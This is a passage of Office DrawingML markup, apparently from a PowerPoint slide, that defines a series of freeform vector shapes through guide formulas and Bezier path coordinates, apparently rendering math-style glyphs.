                    <a:pt x="190" y="116"/>
                    <a:pt x="190" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="197"/>
                    <a:pt x="167" y="225"/>
                    <a:pt x="146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3" name="Freeform 145">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0397BEF-EA5E-49AE-AF9E-450BF20CDAD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041651" y="2555875"/>
              <a:ext cx="93663" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 215 w 243"/>
                <a:gd name="T1" fmla="*/ 31 h 309"/>
                <a:gd name="T2" fmla="*/ 243 w 243"/>
                <a:gd name="T3" fmla="*/ 15 h 309"/>
                <a:gd name="T4" fmla="*/ 223 w 243"/>
                <a:gd name="T5" fmla="*/ 0 h 309"/>
                <a:gd name="T6" fmla="*/ 172 w 243"/>
                <a:gd name="T7" fmla="*/ 0 h 309"/>
                <a:gd name="T8" fmla="*/ 151 w 243"/>
                <a:gd name="T9" fmla="*/ 15 h 309"/>
                <a:gd name="T10" fmla="*/ 179 w 243"/>
                <a:gd name="T11" fmla="*/ 31 h 309"/>
                <a:gd name="T12" fmla="*/ 141 w 243"/>
                <a:gd name="T13" fmla="*/ 184 h 309"/>
                <a:gd name="T14" fmla="*/ 121 w 243"/>
                <a:gd name="T15" fmla="*/ 269 h 309"/>
                <a:gd name="T16" fmla="*/ 121 w 243"/>
                <a:gd name="T17" fmla="*/ 269 h 309"/>
                <a:gd name="T18" fmla="*/ 112 w 243"/>
                <a:gd name="T19" fmla="*/ 225 h 309"/>
                <a:gd name="T20" fmla="*/ 63 w 243"/>
                <a:gd name="T21" fmla="*/ 31 h 309"/>
                <a:gd name="T22" fmla="*/ 91 w 243"/>
                <a:gd name="T23" fmla="*/ 15 h 309"/>
                <a:gd name="T24" fmla="*/ 71 w 243"/>
                <a:gd name="T25" fmla="*/ 0 h 309"/>
                <a:gd name="T26" fmla="*/ 20 w 243"/>
                <a:gd name="T27" fmla="*/ 0 h 309"/>
                <a:gd name="T28" fmla="*/ 0 w 243"/>
                <a:gd name="T29" fmla="*/ 15 h 309"/>
                <a:gd name="T30" fmla="*/ 28 w 243"/>
                <a:gd name="T31" fmla="*/ 31 h 309"/>
                <a:gd name="T32" fmla="*/ 94 w 243"/>
                <a:gd name="T33" fmla="*/ 290 h 309"/>
                <a:gd name="T34" fmla="*/ 121 w 243"/>
                <a:gd name="T35" fmla="*/ 309 h 309"/>
                <a:gd name="T36" fmla="*/ 149 w 243"/>
                <a:gd name="T37" fmla="*/ 291 h 309"/>
                <a:gd name="T38" fmla="*/ 215 w 243"/>
                <a:gd name="T39" fmla="*/ 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9">
                  <a:moveTo>
                    <a:pt x="215" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="31"/>
                    <a:pt x="243" y="31"/>
                    <a:pt x="243" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="0"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="223" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="0"/>
                    <a:pt x="151" y="0"/>
                    <a:pt x="151" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="31"/>
                    <a:pt x="162" y="31"/>
                    <a:pt x="179" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="141" y="184"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="210"/>
                    <a:pt x="125" y="248"/>
                    <a:pt x="121" y="269"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="121" y="269"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="252"/>
                    <a:pt x="116" y="243"/>
                    <a:pt x="112" y="225"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="63" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="31"/>
                    <a:pt x="91" y="31"/>
                    <a:pt x="91" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="0"/>
                    <a:pt x="78" y="0"/>
                    <a:pt x="71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0" y="31"/>
                    <a:pt x="28" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="94" y="290"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="309"/>
                    <a:pt x="107" y="309"/>
                    <a:pt x="121" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="309"/>
                    <a:pt x="144" y="309"/>
                    <a:pt x="149" y="291"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21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4" name="Freeform 146">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C99FA320-44F5-4EF5-A42A-59C5AE9D4702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141664" y="2555875"/>
              <a:ext cx="93663" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 136 w 244"/>
                <a:gd name="T1" fmla="*/ 121 h 305"/>
                <a:gd name="T2" fmla="*/ 122 w 244"/>
                <a:gd name="T3" fmla="*/ 168 h 305"/>
                <a:gd name="T4" fmla="*/ 122 w 244"/>
                <a:gd name="T5" fmla="*/ 168 h 305"/>
                <a:gd name="T6" fmla="*/ 72 w 244"/>
                <a:gd name="T7" fmla="*/ 12 h 305"/>
                <a:gd name="T8" fmla="*/ 48 w 244"/>
                <a:gd name="T9" fmla="*/ 0 h 305"/>
                <a:gd name="T10" fmla="*/ 20 w 244"/>
                <a:gd name="T11" fmla="*/ 0 h 305"/>
                <a:gd name="T12" fmla="*/ 0 w 244"/>
                <a:gd name="T13" fmla="*/ 15 h 305"/>
                <a:gd name="T14" fmla="*/ 26 w 244"/>
                <a:gd name="T15" fmla="*/ 31 h 305"/>
                <a:gd name="T16" fmla="*/ 26 w 244"/>
                <a:gd name="T17" fmla="*/ 275 h 305"/>
                <a:gd name="T18" fmla="*/ 0 w 244"/>
                <a:gd name="T19" fmla="*/ 290 h 305"/>
                <a:gd name="T20" fmla="*/ 20 w 244"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 60 w 244"/>
                <a:gd name="T23" fmla="*/ 305 h 305"/>
                <a:gd name="T24" fmla="*/ 80 w 244"/>
                <a:gd name="T25" fmla="*/ 290 h 305"/>
                <a:gd name="T26" fmla="*/ 54 w 244"/>
                <a:gd name="T27" fmla="*/ 275 h 305"/>
                <a:gd name="T28" fmla="*/ 54 w 244"/>
                <a:gd name="T29" fmla="*/ 37 h 305"/>
                <a:gd name="T30" fmla="*/ 55 w 244"/>
                <a:gd name="T31" fmla="*/ 37 h 305"/>
                <a:gd name="T32" fmla="*/ 94 w 244"/>
                <a:gd name="T33" fmla="*/ 162 h 305"/>
                <a:gd name="T34" fmla="*/ 107 w 244"/>
                <a:gd name="T35" fmla="*/ 196 h 305"/>
                <a:gd name="T36" fmla="*/ 122 w 244"/>
                <a:gd name="T37" fmla="*/ 203 h 305"/>
                <a:gd name="T38" fmla="*/ 139 w 244"/>
                <a:gd name="T39" fmla="*/ 193 h 305"/>
                <a:gd name="T40" fmla="*/ 189 w 244"/>
                <a:gd name="T41" fmla="*/ 37 h 305"/>
                <a:gd name="T42" fmla="*/ 190 w 244"/>
                <a:gd name="T43" fmla="*/ 37 h 305"/>
                <a:gd name="T44" fmla="*/ 190 w 244"/>
                <a:gd name="T45" fmla="*/ 275 h 305"/>
                <a:gd name="T46" fmla="*/ 163 w 244"/>
                <a:gd name="T47" fmla="*/ 290 h 305"/>
                <a:gd name="T48" fmla="*/ 183 w 244"/>
                <a:gd name="T49" fmla="*/ 305 h 305"/>
                <a:gd name="T50" fmla="*/ 224 w 244"/>
                <a:gd name="T51" fmla="*/ 305 h 305"/>
                <a:gd name="T52" fmla="*/ 244 w 244"/>
                <a:gd name="T53" fmla="*/ 290 h 305"/>
                <a:gd name="T54" fmla="*/ 218 w 244"/>
                <a:gd name="T55" fmla="*/ 275 h 305"/>
                <a:gd name="T56" fmla="*/ 218 w 244"/>
                <a:gd name="T57" fmla="*/ 31 h 305"/>
                <a:gd name="T58" fmla="*/ 244 w 244"/>
                <a:gd name="T59" fmla="*/ 15 h 305"/>
                <a:gd name="T60" fmla="*/ 224 w 244"/>
                <a:gd name="T61" fmla="*/ 0 h 305"/>
                <a:gd name="T62" fmla="*/ 196 w 244"/>
                <a:gd name="T63" fmla="*/ 0 h 305"/>
                <a:gd name="T64" fmla="*/ 169 w 244"/>
                <a:gd name="T65" fmla="*/ 20 h 305"/>
                <a:gd name="T66" fmla="*/ 136 w 244"/>
                <a:gd name="T67" fmla="*/ 1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136" y="121"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="139"/>
                    <a:pt x="125" y="154"/>
                    <a:pt x="122" y="168"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="122" y="168"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="145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6" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="26" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10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60" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="305"/>
                    <a:pt x="80" y="305"/>
                    <a:pt x="80" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80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6"/>
                    <a:pt x="94" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="174"/>
                    <a:pt x="104" y="193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8" y="203"/>
                    <a:pt x="135" y="199"/>
                    <a:pt x="139" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="189"/>
                    <a:pt x="183" y="63"/>
                    <a:pt x="189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3" y="275"/>
                    <a:pt x="163" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="305"/>
                    <a:pt x="176" y="305"/>
                    <a:pt x="183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5" name="Freeform 147">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2BAB502-41D1-406A-8E60-9FF72E0F4E88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251201" y="2540000"/>
              <a:ext cx="77788" cy="153988"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 117 w 203"/>
                <a:gd name="T1" fmla="*/ 209 h 388"/>
                <a:gd name="T2" fmla="*/ 171 w 203"/>
                <a:gd name="T3" fmla="*/ 263 h 388"/>
                <a:gd name="T4" fmla="*/ 117 w 203"/>
                <a:gd name="T5" fmla="*/ 317 h 388"/>
                <a:gd name="T6" fmla="*/ 117 w 203"/>
                <a:gd name="T7" fmla="*/ 209 h 388"/>
                <a:gd name="T8" fmla="*/ 86 w 203"/>
                <a:gd name="T9" fmla="*/ 202 h 388"/>
                <a:gd name="T10" fmla="*/ 86 w 203"/>
                <a:gd name="T11" fmla="*/ 318 h 388"/>
                <a:gd name="T12" fmla="*/ 36 w 203"/>
                <a:gd name="T13" fmla="*/ 278 h 388"/>
                <a:gd name="T14" fmla="*/ 44 w 203"/>
                <a:gd name="T15" fmla="*/ 261 h 388"/>
                <a:gd name="T16" fmla="*/ 22 w 203"/>
                <a:gd name="T17" fmla="*/ 238 h 388"/>
                <a:gd name="T18" fmla="*/ 0 w 203"/>
                <a:gd name="T19" fmla="*/ 263 h 388"/>
                <a:gd name="T20" fmla="*/ 86 w 203"/>
                <a:gd name="T21" fmla="*/ 349 h 388"/>
                <a:gd name="T22" fmla="*/ 86 w 203"/>
                <a:gd name="T23" fmla="*/ 367 h 388"/>
                <a:gd name="T24" fmla="*/ 102 w 203"/>
                <a:gd name="T25" fmla="*/ 388 h 388"/>
                <a:gd name="T26" fmla="*/ 117 w 203"/>
                <a:gd name="T27" fmla="*/ 367 h 388"/>
                <a:gd name="T28" fmla="*/ 117 w 203"/>
                <a:gd name="T29" fmla="*/ 348 h 388"/>
                <a:gd name="T30" fmla="*/ 203 w 203"/>
                <a:gd name="T31" fmla="*/ 261 h 388"/>
                <a:gd name="T32" fmla="*/ 117 w 203"/>
                <a:gd name="T33" fmla="*/ 174 h 388"/>
                <a:gd name="T34" fmla="*/ 117 w 203"/>
                <a:gd name="T35" fmla="*/ 70 h 388"/>
                <a:gd name="T36" fmla="*/ 166 w 203"/>
                <a:gd name="T37" fmla="*/ 104 h 388"/>
                <a:gd name="T38" fmla="*/ 159 w 203"/>
                <a:gd name="T39" fmla="*/ 121 h 388"/>
                <a:gd name="T40" fmla="*/ 181 w 203"/>
                <a:gd name="T41" fmla="*/ 143 h 388"/>
                <a:gd name="T42" fmla="*/ 203 w 203"/>
                <a:gd name="T43" fmla="*/ 118 h 388"/>
                <a:gd name="T44" fmla="*/ 117 w 203"/>
                <a:gd name="T45" fmla="*/ 39 h 388"/>
                <a:gd name="T46" fmla="*/ 117 w 203"/>
                <a:gd name="T47" fmla="*/ 20 h 388"/>
                <a:gd name="T48" fmla="*/ 102 w 203"/>
                <a:gd name="T49" fmla="*/ 0 h 388"/>
                <a:gd name="T50" fmla="*/ 86 w 203"/>
                <a:gd name="T51" fmla="*/ 20 h 388"/>
                <a:gd name="T52" fmla="*/ 86 w 203"/>
                <a:gd name="T53" fmla="*/ 39 h 388"/>
                <a:gd name="T54" fmla="*/ 0 w 203"/>
                <a:gd name="T55" fmla="*/ 121 h 388"/>
                <a:gd name="T56" fmla="*/ 86 w 203"/>
                <a:gd name="T57" fmla="*/ 202 h 388"/>
                <a:gd name="T58" fmla="*/ 86 w 203"/>
                <a:gd name="T59" fmla="*/ 167 h 388"/>
                <a:gd name="T60" fmla="*/ 32 w 203"/>
                <a:gd name="T61" fmla="*/ 119 h 388"/>
                <a:gd name="T62" fmla="*/ 86 w 203"/>
                <a:gd name="T63" fmla="*/ 70 h 388"/>
                <a:gd name="T64" fmla="*/ 86 w 203"/>
                <a:gd name="T65" fmla="*/ 16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117" y="209"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="215"/>
                    <a:pt x="171" y="238"/>
                    <a:pt x="171" y="263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="288"/>
                    <a:pt x="149" y="312"/>
                    <a:pt x="117" y="317"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="117" y="209"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="86" y="202"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="86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6" y="349"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="86" y="367"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="375"/>
                    <a:pt x="86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ubicBezTo>
                    <a:pt x="203" y="236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6" y="0"/>
                    <a:pt x="86" y="13"/>
                    <a:pt x="86" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="86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6" y="202"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="86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5" y="75"/>
                    <a:pt x="86" y="70"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="86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6" name="Freeform 148">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E57DCB-F7C6-43BE-8244-D61DBCB21300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478214" y="2652713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7" name="Freeform 149">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAF4EDB1-BB0D-437B-86C2-85CD541490D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551239" y="2540000"/>
              <a:ext cx="77788" cy="153988"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 200 w 204"/>
                <a:gd name="T1" fmla="*/ 29 h 388"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 18 h 388"/>
                <a:gd name="T4" fmla="*/ 186 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 388"/>
                <a:gd name="T6" fmla="*/ 169 w 204"/>
                <a:gd name="T7" fmla="*/ 14 h 388"/>
                <a:gd name="T8" fmla="*/ 4 w 204"/>
                <a:gd name="T9" fmla="*/ 358 h 388"/>
                <a:gd name="T10" fmla="*/ 0 w 204"/>
                <a:gd name="T11" fmla="*/ 370 h 388"/>
                <a:gd name="T12" fmla="*/ 18 w 204"/>
                <a:gd name="T13" fmla="*/ 388 h 388"/>
                <a:gd name="T14" fmla="*/ 35 w 204"/>
                <a:gd name="T15" fmla="*/ 374 h 388"/>
                <a:gd name="T16" fmla="*/ 200 w 204"/>
                <a:gd name="T17" fmla="*/ 2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388">
                  <a:moveTo>
                    <a:pt x="200" y="29"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="21"/>
                    <a:pt x="204" y="21"/>
                    <a:pt x="204" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="9"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="186" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="0"/>
                    <a:pt x="172" y="8"/>
                    <a:pt x="169" y="14"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4" y="358"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="366"/>
                    <a:pt x="0" y="366"/>
                    <a:pt x="0" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="379"/>
                    <a:pt x="8" y="388"/>
                    <a:pt x="18" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="388"/>
                    <a:pt x="32" y="380"/>
                    <a:pt x="35" y="374"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="200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8" name="Freeform 150">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76C2A891-D1D0-4113-B2A2-35C6A22A60B7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644901" y="2592388"/>
              <a:ext cx="90488" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 202 w 237"/>
                <a:gd name="T1" fmla="*/ 31 h 217"/>
                <a:gd name="T2" fmla="*/ 217 w 237"/>
                <a:gd name="T3" fmla="*/ 31 h 217"/>
                <a:gd name="T4" fmla="*/ 237 w 237"/>
                <a:gd name="T5" fmla="*/ 16 h 217"/>
                <a:gd name="T6" fmla="*/ 217 w 237"/>
                <a:gd name="T7" fmla="*/ 0 h 217"/>
                <a:gd name="T8" fmla="*/ 159 w 237"/>
                <a:gd name="T9" fmla="*/ 0 h 217"/>
                <a:gd name="T10" fmla="*/ 139 w 237"/>
                <a:gd name="T11" fmla="*/ 15 h 217"/>
                <a:gd name="T12" fmla="*/ 159 w 237"/>
                <a:gd name="T13" fmla="*/ 31 h 217"/>
                <a:gd name="T14" fmla="*/ 173 w 237"/>
                <a:gd name="T15" fmla="*/ 31 h 217"/>
                <a:gd name="T16" fmla="*/ 118 w 237"/>
                <a:gd name="T17" fmla="*/ 191 h 217"/>
                <a:gd name="T18" fmla="*/ 64 w 237"/>
                <a:gd name="T19" fmla="*/ 31 h 217"/>
                <a:gd name="T20" fmla="*/ 78 w 237"/>
                <a:gd name="T21" fmla="*/ 31 h 217"/>
                <a:gd name="T22" fmla="*/ 98 w 237"/>
                <a:gd name="T23" fmla="*/ 16 h 217"/>
                <a:gd name="T24" fmla="*/ 78 w 237"/>
                <a:gd name="T25" fmla="*/ 0 h 217"/>
                <a:gd name="T26" fmla="*/ 20 w 237"/>
                <a:gd name="T27" fmla="*/ 0 h 217"/>
                <a:gd name="T28" fmla="*/ 0 w 237"/>
                <a:gd name="T29" fmla="*/ 16 h 217"/>
                <a:gd name="T30" fmla="*/ 20 w 237"/>
                <a:gd name="T31" fmla="*/ 31 h 217"/>
                <a:gd name="T32" fmla="*/ 35 w 237"/>
                <a:gd name="T33" fmla="*/ 31 h 217"/>
                <a:gd name="T34" fmla="*/ 92 w 237"/>
                <a:gd name="T35" fmla="*/ 200 h 217"/>
                <a:gd name="T36" fmla="*/ 118 w 237"/>
                <a:gd name="T37" fmla="*/ 217 h 217"/>
                <a:gd name="T38" fmla="*/ 145 w 237"/>
                <a:gd name="T39" fmla="*/ 201 h 217"/>
                <a:gd name="T40" fmla="*/ 202 w 237"/>
                <a:gd name="T41" fmla="*/ 3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17">
                  <a:moveTo>
                    <a:pt x="202" y="31"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="217" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="31"/>
                    <a:pt x="237" y="31"/>
                    <a:pt x="237" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="0"/>
                    <a:pt x="225" y="0"/>
                    <a:pt x="217" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="159" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="139" y="0"/>
                    <a:pt x="139" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="31"/>
                    <a:pt x="151" y="31"/>
                    <a:pt x="159" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118" y="191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64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92" y="200"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="217"/>
                    <a:pt x="108" y="217"/>
                    <a:pt x="118" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="217"/>
                    <a:pt x="139" y="217"/>
                    <a:pt x="145" y="201"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="202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9" name="Freeform 151">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE15BD14-1F6F-4292-AFB3-23CBA41DC744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743326" y="2592388"/>
              <a:ext cx="95250" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 173 w 250"/>
                <a:gd name="T1" fmla="*/ 199 h 218"/>
                <a:gd name="T2" fmla="*/ 193 w 250"/>
                <a:gd name="T3" fmla="*/ 215 h 218"/>
                <a:gd name="T4" fmla="*/ 229 w 250"/>
                <a:gd name="T5" fmla="*/ 215 h 218"/>
                <a:gd name="T6" fmla="*/ 250 w 250"/>
                <a:gd name="T7" fmla="*/ 200 h 218"/>
                <a:gd name="T8" fmla="*/ 230 w 250"/>
                <a:gd name="T9" fmla="*/ 185 h 218"/>
                <a:gd name="T10" fmla="*/ 207 w 250"/>
                <a:gd name="T11" fmla="*/ 185 h 218"/>
                <a:gd name="T12" fmla="*/ 207 w 250"/>
                <a:gd name="T13" fmla="*/ 21 h 218"/>
                <a:gd name="T14" fmla="*/ 187 w 250"/>
                <a:gd name="T15" fmla="*/ 0 h 218"/>
                <a:gd name="T16" fmla="*/ 151 w 250"/>
                <a:gd name="T17" fmla="*/ 0 h 218"/>
                <a:gd name="T18" fmla="*/ 130 w 250"/>
                <a:gd name="T19" fmla="*/ 16 h 218"/>
                <a:gd name="T20" fmla="*/ 150 w 250"/>
                <a:gd name="T21" fmla="*/ 31 h 218"/>
                <a:gd name="T22" fmla="*/ 173 w 250"/>
                <a:gd name="T23" fmla="*/ 31 h 218"/>
                <a:gd name="T24" fmla="*/ 173 w 250"/>
                <a:gd name="T25" fmla="*/ 137 h 218"/>
                <a:gd name="T26" fmla="*/ 117 w 250"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 250"/>
                <a:gd name="T29" fmla="*/ 155 h 218"/>
                <a:gd name="T30" fmla="*/ 77 w 250"/>
                <a:gd name="T31" fmla="*/ 21 h 218"/>
                <a:gd name="T32" fmla="*/ 57 w 250"/>
                <a:gd name="T33" fmla="*/ 0 h 218"/>
                <a:gd name="T34" fmla="*/ 21 w 250"/>
                <a:gd name="T35" fmla="*/ 0 h 218"/>
                <a:gd name="T36" fmla="*/ 0 w 250"/>
                <a:gd name="T37" fmla="*/ 16 h 218"/>
                <a:gd name="T38" fmla="*/ 20 w 250"/>
                <a:gd name="T39" fmla="*/ 31 h 218"/>
                <a:gd name="T40" fmla="*/ 43 w 250"/>
                <a:gd name="T41" fmla="*/ 31 h 218"/>
                <a:gd name="T42" fmla="*/ 43 w 250"/>
                <a:gd name="T43" fmla="*/ 158 h 218"/>
                <a:gd name="T44" fmla="*/ 114 w 250"/>
                <a:gd name="T45" fmla="*/ 218 h 218"/>
                <a:gd name="T46" fmla="*/ 173 w 250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173" y="199"/>
                  </a:move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200"/>
                  </a:cubicBez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3" y="31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7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4" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="218"/>
                    <a:pt x="154" y="213"/>
                    <a:pt x="173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0" name="Freeform 152">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80A02518-5CF6-43FC-8633-62B76F1DBA09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852864" y="2555875"/>
              <a:ext cx="77788" cy="120650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1" name="Freeform 153">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43BDB999-8839-4A5C-8748-321AA186C6D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576514" y="2890838"/>
              <a:ext cx="23813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2" name="Freeform 154">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{711FC98B-7618-4389-9CA5-78F5440B3FC0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676526" y="2890838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3" name="Freeform 155">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DF9518B-B44F-467C-998C-0C69A0648314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776539" y="2890838"/>
              <a:ext cx="23813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4" name="Freeform 156">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F02C1479-A373-4119-BCA9-37232B9CA8E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876551" y="2890838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5" name="Freeform 157">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDE9218B-EA88-4AD0-AA96-8F53BEF9F145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976564" y="2890838"/>
              <a:ext cx="23813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6" name="Freeform 158">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F69CD670-AD16-403F-8C22-85325B1D59EC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076576" y="2890838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7" name="Freeform 159">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D50292CE-0166-46E8-943C-00130CC9F8C4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543176" y="3032125"/>
              <a:ext cx="85725" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 70 w 226"/>
                <a:gd name="T1" fmla="*/ 182 h 304"/>
                <a:gd name="T2" fmla="*/ 132 w 226"/>
                <a:gd name="T3" fmla="*/ 182 h 304"/>
                <a:gd name="T4" fmla="*/ 226 w 226"/>
                <a:gd name="T5" fmla="*/ 91 h 304"/>
                <a:gd name="T6" fmla="*/ 132 w 226"/>
                <a:gd name="T7" fmla="*/ 0 h 304"/>
                <a:gd name="T8" fmla="*/ 20 w 226"/>
                <a:gd name="T9" fmla="*/ 0 h 304"/>
                <a:gd name="T10" fmla="*/ 0 w 226"/>
                <a:gd name="T11" fmla="*/ 14 h 304"/>
                <a:gd name="T12" fmla="*/ 20 w 226"/>
                <a:gd name="T13" fmla="*/ 30 h 304"/>
                <a:gd name="T14" fmla="*/ 35 w 226"/>
                <a:gd name="T15" fmla="*/ 30 h 304"/>
                <a:gd name="T16" fmla="*/ 35 w 226"/>
